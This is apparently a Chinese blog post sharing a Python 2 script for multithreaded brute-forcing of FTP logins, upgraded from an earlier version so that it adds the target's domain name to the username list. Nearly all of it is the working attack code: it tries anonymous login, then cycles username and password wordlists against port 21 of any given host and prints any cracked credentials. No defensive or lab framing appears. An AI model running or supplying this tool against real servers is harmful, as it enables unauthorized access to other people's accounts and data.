升级自:https://www.waitalone.cn/python-ftp-mult.html
在原基础上增加:如果用户输入的目标是域名,则将域名加入到爆破用户列表中,增加爆破成功率。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/env python  
# -*- coding: utf-8 -*-
import ftplib, socket
import sys, time, re, os
from functools import partial
from multiprocessing.dummy import Pool as ThreadPool


def usage():
print '+' + '-' * 50 + '+'
print '\t Python FTP暴力破解工具多线程版'
print '\t\t Time:2014-09-05'
print '+' + '-' * 50 + '+'
if len(sys.argv) != 4:
print "用法: "+os.path.basename(sys.argv[0])+" 待破解的ip/domain 用户名列表 字典列表"
print "实例: "+os.path.basename(sys.argv[0])+" www.alin.cn user.txt pass.txt"
sys.exit()


def brute_anony():
try:
print '[+] 测试匿名登陆……\n'
ftp = ftplib.FTP()
ftp.connect(host, 21, timeout=5)
print 'FTP消息: %s \n' % ftp.getwelcome()
ftp.login()
ftp.retrlines('LIST')
ftp.quit()
print '\n[+] 匿名登陆成功……\n'
except ftplib.all_errors:
print '\n[-] 匿名登陆失败!\n'


def brute_users(user, pwd):
try:
ftp = ftplib.FTP()
ftp.connect(host, 21, timeout=2)
ftp.login(user, pwd)
ftp.quit()
print '\n[+] 破解成功,用户名:%s 密码:%s\n' % (user, pwd)
except ftplib.all_errors:
pass


if __name__ == '__main__':
usage()
start_time = time.time()
thrdlist = []
if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', sys.argv[1]):
host = sys.argv[1]
else:
host = socket.gethostbyname(sys.argv[1])
isExist = 0
isExist1 = 0
with open(sys.argv[2],'r') as tmp:
for line in tmp.readlines():
if sys.argv[1] in line:
isExist = 1
if isExist1 == 1:
break
if re.sub(r'\.\w+$','',sys.argv[1]) in line:
isExist1 = 1
if isExist == 1:
break
with open(sys.argv[2],"a") as f:
if isExist == 0:
f.write("\n"+sys.argv[1])
if isExist1 == 0:
f.write("\n"+re.sub(r'\.\w+$','',sys.argv[1]))
userlist = [i.rstrip() for i in open(sys.argv[2])]
passlist = [j.rstrip() for j in open(sys.argv[3])]
print '目 标:%s \n' % sys.argv[1]
print '用户名:%d 条\n' % len(userlist)
print '密 码:%d 条\n' % len(passlist)
brute_anony()
print '\n[+] 暴力破解测试中……\n'
for user in userlist:
partial_user = partial(brute_users, user)
pool = ThreadPool(10)
pool.map(partial_user, passlist)
pool.close()
pool.join()
print '[+] 破解完成,用时: %d 秒' % (time.time() - start_time)